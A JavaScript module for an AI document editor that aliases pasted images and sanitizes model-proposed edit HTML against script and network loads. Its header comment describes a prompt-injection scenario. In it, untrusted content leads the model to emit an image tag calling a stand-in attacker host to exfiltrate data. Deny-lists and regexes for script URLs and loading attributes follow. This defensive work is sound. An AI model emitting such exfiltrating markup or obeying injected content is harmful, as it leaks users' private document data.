/**
 * HTML hygiene for Inky's document edits, shared by the server path (surfaceBridge /
 * clientActions) and the browser fallback (docEditPlanner).
 *
 * 1. IMAGE ALIASES. Pasted images live in the document as base64 `data:` URLs that can run to
 *    hundreds of kilobytes. Sending them to the model wastes the html budget (later blocks lose
 *    their html) and forces the model to echo them byte for byte in replace_block, which it
 *    cannot do reliably. Before a block's html leaves the browser, every `src="data:..."` becomes
 *    a short stable alias `src="quill-img:<fnv32>-<length>"` derived from the data itself, so the
 *    same image always gets the same alias and no per-request map has to travel with the plan.
 *    When a plan comes back, the aliases are restored from the images of the LIVE editor.
 *
 * 2. SAFETY. The model reads untrusted tenant content (meeting transcripts, uploaded files), so a
 *    prompt-injected plan could carry `<img src="https://attacker/?d=...">`, which the editor
 *    would fetch the moment the suggestion is displayed. {@link sanitizeEditHtml} removes
 *    anything that loads or runs on display: remote images that are not already in the document
 *    (or on the app's own origins), embeds, scripts, styles, event handlers, script URLs and CSS
 *    `url(...)`. The editor schema is the allow-list for structure; this is the deny-list for
 *    network and script access on top of it. The server refuses such plans as well
 *    (supabase/functions/inky-agent/editPlan.ts); this is the browser's own line of defence.
 */

/** Alias scheme for aliased image sources. */
export const IMAGE_ALIAS_PREFIX = "quill-img:";

/** `src="data:..."` / `src='data:...'` attributes. */
const DATA_SRC_RE = /\bsrc\s*=\s*(["'])(data:[^"']*)\1/gi;
/** Aliased `src` attributes. */
const ALIAS_SRC_RE = /\bsrc\s*=\s*(["'])(quill-img:[0-9a-z-]+)\1/gi;

/** Small cache: data URL -> alias (hashing a large data URL on every snapshot is wasteful). */
const aliasCache = new Map();
const ALIAS_CACHE_LIMIT = 64;

/**
 * 32-bit FNV-1a hash as 8 hex characters.
 * @param {string} text - Input.
 * @returns {string} Hex hash.
 */
const fnv1aHex = (text) => {
  let hash = 0x811c9dc5;
  for (let i = 0; i < text.length; i += 1) {
    hash ^= text.charCodeAt(i);
    hash = Math.imul(hash, 0x01000193);
  }
  return (hash >>> 0).toString(16).padStart(8, "0");
};

/**
 * Stable alias for one data URL (content hash plus length, so two different images practically
 * never share an alias).
 * @param {string} dataUrl - `data:` URL.
 * @returns {string} Alias such as `quill-img:1a2b3c4d-5k2`.
 */
export const imageAliasFor = (dataUrl) => {
  const cached = aliasCache.get(dataUrl);
  if (cached) return cached;
  const alias = `${IMAGE_ALIAS_PREFIX}${fnv1aHex(dataUrl)}-${dataUrl.length.toString(36)}`;
  if (aliasCache.size >= ALIAS_CACHE_LIMIT) aliasCache.delete(aliasCache.keys().next().value);
  aliasCache.set(dataUrl, alias);
  return alias;
};

/**
 * Replace every `data:` image source in html with its alias.
 * @param {string} html - Block html.
 * @returns {string} Aliased html.
 */
export const aliasImageSources = (html) => {
  const text = typeof html === "string" ? html : "";
  if (!text || !/data:/i.test(text)) return text;
  return text.replace(DATA_SRC_RE, (_match, quote, dataUrl) => `src=${quote}${imageAliasFor(dataUrl)}${quote}`);
};

/**
 * Alias -> data URL for every `data:` image in some blocks (normally the live editor's).
 * @param {Array<{html?: string}>} blocks - Blocks with html.
 * @returns {Map<string, string>} Alias map.
 */
export const imageAliasMap = (blocks) => {
  const map = new Map();
  for (const block of blocks || []) {
    const html = typeof block?.html === "string" ? block.html : "";
    if (!html || !/data:/i.test(html)) continue;
    for (const match of html.matchAll(DATA_SRC_RE)) map.set(imageAliasFor(match[2]), match[2]);
  }
  return map;
};

/**
 * Restore aliased image sources. An alias with no image in the map (an invented one, or an image
 * deleted since the plan was made) is dropped together with its <img> tag: a broken image is
 * worse than none.
 * @param {string} html - Op html.
 * @param {Map<string, string>} map - Alias map from {@link imageAliasMap}.
 * @returns {{html: string, missing: number}} Restored html and the number of unknown aliases.
 */
export const restoreImageAliases = (html, map) => {
  const text = typeof html === "string" ? html : "";
  if (!text || !text.includes(IMAGE_ALIAS_PREFIX)) return { html: text, missing: 0 };
  let missing = 0;
  const withoutUnknown = text.replace(/<img\b[^>]*>/gi, (tag) => {
    const alias = /\bsrc\s*=\s*(["'])(quill-img:[0-9a-z-]+)\1/i.exec(tag)?.[2];
    if (!alias || map.has(alias)) return tag;
    missing += 1;
    return "";
  });
  return {
    html: withoutUnknown.replace(ALIAS_SRC_RE, (match, quote, alias) => (map.has(alias) ? `src=${quote}${map.get(alias)}${quote}` : match)),
    missing,
  };
};

/** Elements that load something, run something or carry a form: never part of an edit. */
const FORBIDDEN_TAGS = new Set([
  "script", "style", "iframe", "frame", "frameset", "object", "embed", "applet", "link", "meta", "base",
  "form", "input", "button", "textarea", "select", "option", "video", "audio", "source", "track",
  "picture", "svg", "math", "canvas", "portal", "template", "noscript",
]);
/** Attributes that load a resource on display. */
const LOADING_ATTRS = new Set(["srcset", "background", "poster", "ping", "lowsrc", "dynsrc", "longdesc", "formaction", "action", "xlink:href"]);
/** URL attributes checked for script schemes. */
const URL_ATTRS = new Set(["href", "src", "cite", "data"]);
/** `javascript:` / `vbscript:` (also with whitespace or control characters spliced in). */
// eslint-disable-next-line no-control-regex
const SCRIPT_URL_RE = /^[\s\u0000-\u001f]*(?:j[\s\u0000-\u001f]*a[\s\u0000-\u001f]*v[\s\u0000-\u001f]*a[\s\u0000-\u001f]*s[\s\u0000-\u001f]*c[\s\u0000-\u001f]*r[\s\u0000-\u001f]*i[\s\u0000-\u001f]*p[\s\u0000-\u001f]*t|vbscript)\s*:/i;
/** CSS that can load or run something. */
const DANGEROUS_CSS_RE = /url\s*\(|expression\s*\(|@import|behavior\s*:|-moz-binding/i;

/**
 * Origins whose images may appear in an edit without already being in the document: the app
 * itself and the project's Supabase storage.
 * @returns {string[]} Origins.
 */
export const defaultImageOrigins = () => {
  const origins = [];
  try {
    if (typeof window !== "undefined" && window.location?.origin && window.location.origin !== "null") origins.push(window.location.origin);
  } catch {
    /* no window */
  }
  try {
    const supabaseUrl = process.env.REACT_APP_SUPABASE_URL;
    if (supabaseUrl) origins.push(new URL(supabaseUrl).origin);
  } catch {
    /* unset or malformed */
  }
  return origins;
};

/**
 * Image sources already present in some blocks (the user put them there, so keeping them in a
 * rewritten block reveals nothing new).
 * @param {Array<{html?: string}>} blocks - Blocks with html.
 * @returns {Set<string>} Sources.
 */
export const existingImageSources = (blocks) => {
  const out = new Set();
  for (const block of blocks || []) {
    const html = typeof block?.html === "string" ? block.html : "";
    if (!html || !/<img\b/i.test(html)) continue;
    for (const match of html.matchAll(/<img\b[^>]*?\bsrc\s*=\s*(["'])([^"']*)\1/gi)) {
      out.add(decodeEntities(match[2]).trim());
    }
  }
  return out;
};

/**
 * Decode the few entities that can appear in an attribute value.
 * @param {string} value - Raw attribute text.
 * @returns {string} Decoded value.
 */
const decodeEntities = (value) =>
  String(value || "")
    .replace(/&amp;/gi, "&")
    .replace(/&quot;/gi, '"')
    .replace(/&#39;/gi, "'")
    .replace(/&lt;/gi, "<")
    .replace(/&gt;/gi, ">");

/**
 * Whether an image source may be displayed.
 * @param {string} src - Image src (decoded).
 * @param {{origins: string[], existing: Set<string>}} allow - Allowed origins and sources.
 * @returns {boolean} True when safe to display.
 */
const imageSourceAllowed = (src, { origins, existing }) => {
  const value = String(src || "").trim();
  if (!value) return false;
  if (/^data:image\//i.test(value)) return true;
  if (existing.has(value)) return true;
  if (value.startsWith("/") && !value.startsWith("//") && !value.startsWith("/\\")) return true;
  try {
    const url = new URL(value);
    return (url.protocol === "https:" || url.protocol === "http:") && origins.includes(url.origin);
  } catch {
    return false;
  }
};

/**
 * Remove whatever in an edit's html would load a resource or run code when displayed.
 * @param {string} html - Edit html (aliases already restored).
 * @param {{origins?: string[], existingSources?: Set<string>}} [options] - Image allow-list.
 * @returns {{html: string, removed: number}} Safe html and how many things were removed.
 */
export const sanitizeEditHtml = (html, { origins = defaultImageOrigins(), existingSources = new Set() } = {}) => {
  const text = typeof html === "string" ? html : "";
  if (!text || !/[<&]/.test(text)) return { html: text, removed: 0 };
  if (typeof DOMParser === "undefined") return sanitizeWithoutDom(text, { origins, existing: existingSources });
  let removed = 0;
  const doc = new DOMParser().parseFromString(`<body>${text}</body>`, "text/html");
  const allow = { origins, existing: existingSources };
  for (const el of Array.from(doc.body.querySelectorAll("*"))) {
    if (!el.isConnected) continue;
    const tag = el.tagName.toLowerCase();
    if (FORBIDDEN_TAGS.has(tag)) {
      el.remove();
      removed += 1;
      continue;
    }
    if (tag === "img" && !imageSourceAllowed(el.getAttribute("src"), allow)) {
      el.remove();
      removed += 1;
      continue;
    }
    for (const attr of Array.from(el.attributes)) {
      const name = attr.name.toLowerCase();
      const value = attr.value || "";
      const drop =
        name.startsWith("on") ||
        LOADING_ATTRS.has(name) ||
        (name === "style" && DANGEROUS_CSS_RE.test(value)) ||
        (URL_ATTRS.has(name) && SCRIPT_URL_RE.test(value)) ||
        (name === "href" && /^\s*data:/i.test(value));
      if (drop) {
        el.removeAttribute(attr.name);
        removed += 1;
      }
    }
  }
  return { html: removed ? doc.body.innerHTML : text, removed };
};

/**
 * Regex fallback for environments without DOMParser (never the browser; kept for safety).
 * @param {string} text - Html.
 * @param {{origins: string[], existing: Set<string>}} allow - Image allow-list.
 * @returns {{html: string, removed: number}} Safe html.
 */
const sanitizeWithoutDom = (text, allow) => {
  let removed = 0;
  const tags = [...FORBIDDEN_TAGS].join("|");
  let out = text
    .replace(new RegExp(`<(${tags})\\b[\\s\\S]*?<\\/\\1\\s*>`, "gi"), () => {
      removed += 1;
      return "";
    })
    .replace(new RegExp(`<\\/?(${tags})\\b[^>]*>`, "gi"), () => {
      removed += 1;
      return "";
    });
  out = out.replace(/<img\b[^>]*>/gi, (tag) => {
    const src = /\bsrc\s*=\s*(["'])([^"']*)\1/i.exec(tag)?.[2] || "";
    if (imageSourceAllowed(decodeEntities(src), allow)) return tag;
    removed += 1;
    return "";
  });
  out = out.replace(/<[a-z][^>]*>/gi, (tag) =>
    tag
      .replace(/\s(on[a-z]+|srcset|background|poster|ping|lowsrc|dynsrc|longdesc|formaction|action|xlink:href)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, () => {
        removed += 1;
        return "";
      })
      .replace(/\s(href|src|cite|data)\s*=\s*(["'])\s*(?:javascript|vbscript)\s*:[^"']*\2/gi, () => {
        removed += 1;
        return "";
      })
      .replace(/\sstyle\s*=\s*(["'])([^"']*)\1/gi, (match, _quote, css) => {
        if (!DANGEROUS_CSS_RE.test(css)) return match;
        removed += 1;
        return "";
      })
  );
  return { html: out, removed };
};

/** Op fields that carry html. */
const HTML_FIELDS = ["html"];

/**
 * Make a plan ready for the live editor: restore image aliases from the editor's own images,
 * then strip anything that would load or run on display.
 * @param {Array<object>} ops - Plan ops.
 * @param {Array<{html?: string}>} liveBlocks - The live editor's blocks (getBlocks()).
 * @param {{origins?: string[]}} [options] - Allowed image origins (defaults to the app's).
 * @returns {{ops: Array<object>, removed: number, missingImages: number}} Prepared ops.
 */
export const prepareOpsForEditor = (ops, liveBlocks, { origins = defaultImageOrigins() } = {}) => {
  const list = Array.isArray(ops) ? ops : [];
  const needsAliases = list.some((op) => HTML_FIELDS.some((field) => typeof op?.[field] === "string" && op[field].includes(IMAGE_ALIAS_PREFIX)));
  const map = needsAliases ? imageAliasMap(liveBlocks) : new Map();
  const existingSources = existingImageSources(liveBlocks);
  let removed = 0;
  let missingImages = 0;
  const prepared = list.map((op) => {
    if (!op || typeof op !== "object") return op;
    let next = op;
    for (const field of HTML_FIELDS) {
      if (typeof op[field] !== "string" || !op[field]) continue;
      const restored = restoreImageAliases(op[field], map);
      missingImages += restored.missing;
      const safe = sanitizeEditHtml(restored.html, { origins, existingSources });
      removed += safe.removed;
      if (safe.html !== op[field]) next = { ...next, [field]: safe.html };
    }
    return next;
  });
  return { ops: prepared, removed, missingImages };
};

/**
 * Same as {@link prepareOpsForEditor} for one html string (a drafted document).
 * @param {string} html - Html.
 * @param {Array<{html?: string}>} liveBlocks - The live editor's blocks.
 * @returns {{html: string, removed: number, missingImages: number}} Prepared html.
 */
export const prepareHtmlForEditor = (html, liveBlocks) => {
  const { ops, removed, missingImages } = prepareOpsForEditor([{ op: "replace_document", html }], liveBlocks);
  return { html: ops[0]?.html || "", removed, missingImages };
};

/** Markup that makes a textless block real content (images, tables, diagrams, fields, page breaks...). */
const STRUCTURAL_HTML_RE = /<(?:img|table|hr|iframe|video|svg)\b|data-mermaid|data-trust-section|data-tpl-field|data-field-id|data-page-break/i;

/**
 * Whether html holds content that has no text: images, tables, rules, diagrams, trust sections,
 * template fields or page breaks.
 * @param {string} html - Html.
 * @returns {boolean} True when such markup is present.
 */
export const htmlHasStructure = (html) => STRUCTURAL_HTML_RE.test(String(html || ""));

/**
 * Whether a document's blocks hold nothing at all: only paragraphs or headings with no text and no
 * images, tables, diagrams, trust sections, fields or page breaks. A document that is just a pasted screenshot
 * is NOT empty, so it is never drafted over with a whole-document replace.
 * @param {Array<{type?: string, text?: string, html?: string, truncated?: boolean}>} blocks - Blocks.
 * @returns {boolean} True when structurally empty.
 */
export const blocksAreEmpty = (blocks) =>
  (blocks || []).every(
    (block) =>
      (block?.type === "paragraph" || block?.type === "heading") &&
      !String(block.text || "").trim() &&
      !block.truncated &&
      !STRUCTURAL_HTML_RE.test(String(block.html || ""))
  );
